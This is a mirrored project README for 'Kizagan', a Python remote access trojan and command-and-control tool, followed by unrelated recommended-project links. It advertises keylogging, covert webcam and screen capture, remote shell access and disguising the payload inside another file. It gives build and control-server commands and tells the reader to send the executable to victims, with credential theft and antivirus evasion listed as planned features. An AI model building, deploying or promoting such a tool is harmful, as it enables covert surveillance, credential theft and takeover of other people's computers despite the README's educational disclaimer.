Giter Club home page Giter Club logo

kizagan's Introduction

KIZAGAN

Kizagan is a RAT,C2 tool built with python.Kizagan can build executables and control infected machines.

a

Features

  • Basic file/directory commands.(rename, delete, create etc.)

  • Download/Upload files.

  • Execute shell/terminal commands directly.

  • Take victim snap screenshot.

  • Watch live screen stream.

  • Take victim camera snapshot.

  • Watch live victim camera.

  • Advanced keylogger.

  • Merge executable with an arbitrary file.

FEAUTURES TO DO

  • Encrypted connection

  • Persistence

  • Wifi names and passwords

  • Browser datas

  • Applications to make FUD

  • GUI

  • Access microphone

SETUP

Clone the project or download the zip file and extract it.

git clone https://github.com/st4inl3s5/kizagan

To make setup, use the following command :

pip install -r requirements.txt

USAGE

Build an executable file with following command :

python3 kizagan.py build -ip <control_server_ip> -p <control_server_port> -i <your_icon_file> -m <your_merge_file> -n <executable_name>

1

2

3

4

Send the executable file to victims.

Start the control server with following command :

python3 kizagan.py control -ip <control_server_ip> -p <control_server_port>

5

6

Wait for the victims to open your executable.When a victims open your executable, victims will appear in terminal :

7

Press CTRL+C to interact with a victim :

8

Type 'help' to view help menu.

9

MOTIVATION

"Buy Me A Coffee"

My motivation to develop kizagan, your donations, improve my cyber and software knowledge.

DISCLAIMER

This tool developed for educational and red team purposes.Don't use this tool for illegal purposes.I am not responsible for illegal actions.

So the kizagan under development, it can have bugs.Please report me the bugs you find.

CONTACT

https://www.instagram.com/arduinocum.py/

https://t.me/+5XoMhXv4SghhYmE0

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.